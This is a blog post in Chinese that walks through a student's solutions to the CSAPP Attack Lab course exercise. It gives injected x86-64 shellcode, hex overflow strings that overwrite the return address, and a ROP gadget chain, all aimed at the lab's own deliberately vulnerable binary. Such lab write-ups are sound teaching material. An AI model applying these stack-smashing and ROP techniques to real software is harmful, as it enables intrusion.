<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>CSAPP - Attack Lab 记录 - HLin&#39;s Blog</title>
  <meta name="renderer" content="webkit" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>

<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">


<meta name="author" content="Humphrey Lin" /><meta name="description" content="Phase 1 先根据提示，读一下 getbuf 的源代码，可以发现 BUFFER_SIZE 的大小为 0x28 ，也就是 40 个字节。继续读汇编代码可以发现，touch1 的地址为 0x04017c0 。于是只要先输入 40 个任" />






<meta name="generator" content="Hugo 0.53 with even 4.0.0" />


<link rel="canonical" href="https://humpylin.github.io/post/csapp/attacklab/" />
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/manifest.json">
<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">


<link href="/dist/even.66a860a0.min.css" rel="stylesheet">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.css" integrity="sha256-7TyXnr2YU040zfSP+rEcz29ggW4j56/ujTPwjMzyqFY=" crossorigin="anonymous">


<meta property="og:title" content="CSAPP - Attack Lab 记录" />
<meta property="og:description" content="Phase 1 先根据提示，读一下 getbuf 的源代码，可以发现 BUFFER_SIZE 的大小为 0x28 ，也就是 40 个字节。继续读汇编代码可以发现，touch1 的地址为 0x04017c0 。于是只要先输入 40 个任" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://humpylin.github.io/post/csapp/attacklab/" /><meta property="article:published_time" content="2019-08-08T20:17:53&#43;08:00"/>
<meta property="article:modified_time" content="2019-08-08T20:17:53&#43;08:00"/>

<meta itemprop="name" content="CSAPP - Attack Lab 记录">
<meta itemprop="description" content="Phase 1 先根据提示，读一下 getbuf 的源代码，可以发现 BUFFER_SIZE 的大小为 0x28 ，也就是 40 个字节。继续读汇编代码可以发现，touch1 的地址为 0x04017c0 。于是只要先输入 40 个任">


<meta itemprop="datePublished" content="2019-08-08T20:17:53&#43;08:00" />
<meta itemprop="dateModified" content="2019-08-08T20:17:53&#43;08:00" />
<meta itemprop="wordCount" content="975">



<meta itemprop="keywords" content="CSAPP,CSAPP Lab," />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CSAPP - Attack Lab 记录"/>
<meta name="twitter:description" content="Phase 1 先根据提示，读一下 getbuf 的源代码，可以发现 BUFFER_SIZE 的大小为 0x28 ，也就是 40 个字节。继续读汇编代码可以发现，touch1 的地址为 0x04017c0 。于是只要先输入 40 个任"/>

<!--[if lte IE 9]>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js"></script>
<![endif]-->

<!--[if lt IE 9]>
  <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
<![endif]-->

</head>
<body>
  <div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/" class="logo">HLin&#39;s Blog</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>
<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    <a href="/">
        <li class="mobile-menu-item">Home</li>
      </a><a href="/post/">
        <li class="mobile-menu-item">Archives</li>
      </a><a href="/tags/">
        <li class="mobile-menu-item">Tags</li>
      </a><a href="/categories/">
        <li class="mobile-menu-item">Categories</li>
      </a>
  </ul>
</nav>
  <div class="container" id="mobile-panel">
    <header id="header" class="header">
        <div class="logo-wrapper">
  <a href="/" class="logo">HLin&#39;s Blog</a>
</div>

<nav class="site-navbar">
  <ul id="menu" class="menu">
    <li class="menu-item">
        <a class="menu-item-link" href="/">Home</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/post/">Archives</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/tags/">Tags</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/categories/">Categories</a>
      </li>
  </ul>
</nav>
    </header>

    <main id="main" class="main">
      <div class="content-wrapper">
        <div id="content" class="content">
          <article class="post">
    
    <header class="post-header">
      <h1 class="post-title">CSAPP - Attack Lab 记录</h1>

      <div class="post-meta">
        <span class="post-time"> 2019-08-08 </span>
        <div class="post-category">
            <a href="/categories/notes/"> Notes </a>
            </div>
        
      </div>
    </header>

    <div class="post-toc" id="post-toc">
  <h2 class="post-toc-title">Contents</h2>
  <div class="post-toc-content always-active">
    <nav id="TableOfContents">
<ul>
<li>
<ul>
<li><a href="#phase-1">Phase 1</a></li>
<li><a href="#phase-2">Phase 2</a></li>
<li><a href="#phase-3">Phase 3</a></li>
<li><a href="#phase-4">Phase 4</a></li>
<li><a href="#phase-5">Phase 5</a></li>
<li><a href="#收获">收获</a></li>
</ul></li>
</ul>
</nav>
  </div>
</div>
    <div class="post-content">
      

<h2 id="phase-1">Phase 1</h2>

<p>先根据提示，读一下 getbuf 的源代码，可以发现 BUFFER_SIZE 的大小为 0x28 ，也就是 40 个字节。继续读汇编代码可以发现，touch1 的地址为 0x04017c0 。于是只要先输入 40 个任意字符（不是换行或者 EOF），再输入地址就可以了。这里要注意一个大小端的问题，可以先用 GDB 看看到底是怎样的，我的机器要输入的便是 <code>c0 17 40</code> 以及后面接上若干零凑成十六位。</p>

<h2 id="phase-2">Phase 2</h2>

<p>这一次不断需要修改返回地址，还需要修改 <code>%rdi</code> 的值。除非可以执行自己写的 <code>mov</code> 指令，否则很难修改 <code>%rdi</code> 的值，但是要如何在程序里运行自己写的代码呢？通过输入的字符串。只需要保证自己输入了一条指令，然后让 getbuf 跳转到自己写得命令即可。</p>

<p>根据自己的 cookie 写好指令：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code class="language-assembly" data-lang="assembly"><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-assembly" data-lang="assembly">mov $0x59b997fa, %rdi # write my cookie into %rdi
pushq $0x04017ec # touch2
retq</code></pre></td></tr></table>
</div>
</div>
<p>转换成汇编代码：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code class="language-assembly" data-lang="assembly"><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-assembly" data-lang="assembly">0000000000000000 &lt;.text&gt;:
    0:   48 c7 c7 fa 97 b9 59    mov    $0x59b997fa,%rdi
    7:   68 ec 17 40 00          pushq  $0x4017ec
    c:   c3                      retq</code></pre></td></tr></table>
</div>
</div>
<p>通过 GDB 可以看到，运行完 Gets 时，<code>%rsp</code> 的值为 0x5561dc78 。故第二个字符串应该如下。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></pre></td>
<td class="lntd">
<pre class="chroma">48 c7 c7 fa 97 b9 59 68
ec 17 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00</pre></td></tr></table>
</div>
</div>
<h2 id="phase-3">Phase 3</h2>

<p>这一次要求参数是一个字符串，先查 ASCII 表，把 Cookie 的字符串变成十六进制的形式，我的为 <code>35 39 62 39 39 37 66 61 00</code> 。然后和 phase 2 一样，写好传参的代码。这里一开始改变了栈指针，是因为我选择把字符串放在最后，然后通过移动栈指针来保护字符串，字符串本身的九个字符以及之前 ret 的地址，共需要移动 17 个字节。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code class="language-assembly" data-lang="assembly"><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-assembly" data-lang="assembly">sub $0x11, %rsp
mov %rsp, %rdi
pushq $0x4018fa
retq</code></pre></td></tr></table>
</div>
</div>
<p>转换成汇编代码。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code class="language-assembly" data-lang="assembly"><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-assembly" data-lang="assembly">Disassembly of section .text:

0000000000000000 &lt;.text&gt;:
   0:   48 83 ec 11             sub    $0x11,%rsp
   4:   48 89 e7                mov    %rsp,%rdi
   7:   68 fa 18 40 00          pushq  $0x4018fa
   c:   c3                      retq</code></pre></td></tr></table>
</div>
</div>
<p>然后写成十六进制形式，需要把字符串放置于 return 地址的前面。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></pre></td>
<td class="lntd">
<pre class="chroma">48 83 ec 11 48 89 e7 68
fa 18 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 35
39 62 39 39 37 66 61 00
78 dc 61 55 00 00 00 00</pre></td></tr></table>
</div>
</div>
<h2 id="phase-4">Phase 4</h2>

<p>这一次是要利用 gadgets 来实现攻击，我们要执行的汇编代码应该先通过 pop 将 cookie 传给 <code>%rdi</code> ，然后再返回到 touch 2 函数。不过查看 start farm 到 mid farm 中间的函数，并没有 <code>5f</code> 可以使用，那么不妨先将 cookie 传给某个中间寄存器，再传给 <code>%rdi</code> ，阅读函数，发现 <code>addval_219</code> 以及 <code>setval_426</code> 可以做到。</p>

<p>那么本题字符串如下。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span><span class="lnt">8
</span><span class="lnt">9
</span></pre></td>
<td class="lntd">
<pre class="chroma">00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 
ab 19 40 00 00 00 00 00
fa 97 b9 59 00 00 00 00 
c5 19 40 00 00 00 00 00
ec 17 40 00 00 00 00 00</pre></td></tr></table>
</div>
</div>
<h2 id="phase-5">Phase 5</h2>

<p>（既然文档都不断规劝我不要做了，那我就不做了吧……）</p>

<h2 id="收获">收获</h2>

<p>对两种攻击方式有了更深的了解，不过似乎这些方式在加入了金丝雀数的后都无法奏效了。另外也明白了缓冲区溢出的危险。</p>

    </div>

    <div class="post-copyright">
  <p class="copyright-item">
    <span class="item-title">Author</span>
    <span class="item-content">Humphrey Lin</span>
  </p>
  <p class="copyright-item">
    <span class="item-title">LastMod</span>
    <span class="item-content">
        2019-08-08
        
    </span>
  </p>
  
  
</div>
<footer class="post-footer">
      <div class="post-tags">
          <a href="/tags/csapp/">CSAPP</a>
          <a href="/tags/csapp-lab/">CSAPP Lab</a>
          </div>
      <nav class="post-nav">
        
        <a class="next" href="/post/csapp/bomblab/">
            <span class="next-text nav-default">CSAPP - Bomb Lab 记录</span>
            <span class="next-text nav-mobile">Next</span>
            <i class="iconfont icon-right"></i>
          </a>
      </nav>
    </footer>
  </article>
        </div>
        <div id="disqus_thread"></div>
    <script type="text/javascript">
    (function() {
      
      
      if (window.location.hostname === 'localhost') return;

      var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
      var disqus_shortname = 'humpylin-blog';
      dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
    </script>
    <noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
  
  

  

      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="social-links">
      <a href="mailto:humpylin@gmail.com" class="iconfont icon-email" title="email"></a>
      <a href="https://github.com/humpylin" class="iconfont icon-github" title="github"></a>
  <a href="https://humpylin.github.io/index.xml" type="application/rss+xml" class="iconfont icon-rss" title="rss"></a>
</div>

<div class="copyright">
  <span class="power-by">
    Powered by <a class="hexo-link" href="https://gohugo.io">Hugo</a>
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    Theme - 
    <a class="theme-link" href="https://github.com/olOwOlo/hugo-theme-even">Even</a>
  </span>

  

  <span class="copyright-year">
    &copy; 
    2019
    <span class="heart">
      <i class="iconfont icon-heart"></i>
    </span>
    <span class="author">Humphrey Lin</span>
  </span>
</div>
    </footer>

    <div class="back-to-top" id="back-to-top">
      <i class="iconfont icon-up"></i>
    </div>
  </div>
  
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.2.1/dist/jquery.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/slideout@1.0.1/dist/slideout.min.js" integrity="sha256-t+zJ/g8/KXIJMjSVQdnibt4dlaDxc9zXr/9oNPeWqdg=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.js" integrity="sha256-XVLffZaxoWfGUEbdzuLi7pwaUJv1cecsQJQqGLe7axY=" crossorigin="anonymous"></script>
<script type="text/javascript" src="/dist/even.26188efa.min.js"></script>
  <script type="text/javascript">
    window.MathJax = {
      tex2jax: {inlineMath: [['$','$'], ['\\(','\\)']]},
      showProcessingMessages: false,
      messageStyle: 'none'
    };
  </script>
  <script async src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/MathJax.js?config=TeX-MML-AM_CHTML"  integrity="sha256-nvJJv9wWKEm88qvoQl9ekL2J+k/RWIsaSScxxlsrv8k=" crossorigin="anonymous"></script>


<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
	ga('create', 'UA-129102042-2', 'auto');
	ga('set', 'anonymizeIp', true);
	ga('send', 'pageview');
}
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>







</body>
</html>
